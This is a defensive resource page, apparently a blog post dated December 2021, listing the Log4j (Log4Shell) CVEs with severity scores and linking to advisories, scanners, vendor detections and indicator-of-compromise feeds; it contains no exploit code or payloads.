Log4j vulnerability (aka, Log4Shell, CVE-2021-44228) Updates

Advisory

The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system.

CISA encourages users and administrators to review the Apache Log4j 2.15.0 Announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.

At this point, 4 CVEs have been released regarding Log4j Vulnerability (aka, Log4Shell – CVE-2021-44228).

▶ CVE-202-44228 (CVSS 10.0, Critical): the original zero-day, a vulnerability which can attacker allow for remote execute code (RCE) through log messages in Log4j 2.x version.

▶ CVE-2021-45046 (CVSS 3.7, Low): A vulnerability that allows an attacker to generate a Denied of Service (DoS) error through log messages, aka, “incomplete fix.”

▶ CVE-2021-45105 (CVSS 7.5, High): Apache Log4j is prone to a Denial-of-Service(DoS) vulnerability while parsing certain crafted HTTP requests.

▶ CVE-2021-4104 (CVSS 8.1, High): A vulnerability found in JMSAppender, another component of Log4j, that allows remote code execution (RCE) through log messages.

▶ CISA's Apache Log4j Vulnerability Guidance

* Reference articles:

Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk (TheHackerNews)

Vulnerability Details

Apache Log4j Security Vulnerabilities (apache.org)

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation (Microsoft)

Log4j/Log4Shell vulnerability scanning and exploit detection in Uptycs osquery (Uptycs)

Finding applications that use Log4J (Rumble)

How to detect the Log4j vulnerability in your applications (InfoWorld)

Log4j impact on manufacturers and components summary

BlueTeam Cheatsheet for Log4Shell with a vendor list

Log4 related software list

Scanner

Log4j RCE Exploitation Detection (by Florian Roth, CISA's link)

CVE-2021-44228 vulnerability scanner with mitigation patch (by Logpresso)

Log4Shell scanner (by IoTCube)

Log4j2 RCE Exploitation Detection with Python

Burp Scanner (by IBM X-Force Red)

Security Vendors

▶ Palo Alto Networks

Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228)

Next-Generation Firewalls with a Threat Prevention security subscription can automatically block sessions related to this vulnerability using Threat IDs -

- 91991 (initially released using Applications and Threat content update version 8498 and further enhanced with version 8499). Additionally, attacker infrastructure is continuously being monitored and blocked.

- 91994 and 91995 (released using Applications Threat content version 8500).

▶ Fortinet

Fortinet Outbreak Alert - Log4j2 Vulnerability

▶ IBM

Detection of Log4Shell (CVE-2021-44228) using QRadar

▶ Splunk

Log4Shell - Detecting Log4j 2 RCE Using Splunk

Indicator of Compromise (IoC)

▶ Log4Shell-IOCs

Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell exploit targeting CVE-2021-44228 in Log4j

▶ GreyNoise is providing IOCs for CVE-2021-44228 Apache Log4j RCE attempts on Github.
C2/Callback domains here.
Latest IPs here.

▶ Microsoft

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered.

▶ Talos

Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild

▶ 360 Netlab

Threat Alert: Log4j Vulnerability Has Been adopted by two Linux Botnets

HOME

Network

Vendors

Cybersecurity

IT

Resources

Tags

About

AnalysisMan

Saturday, December 11, 2021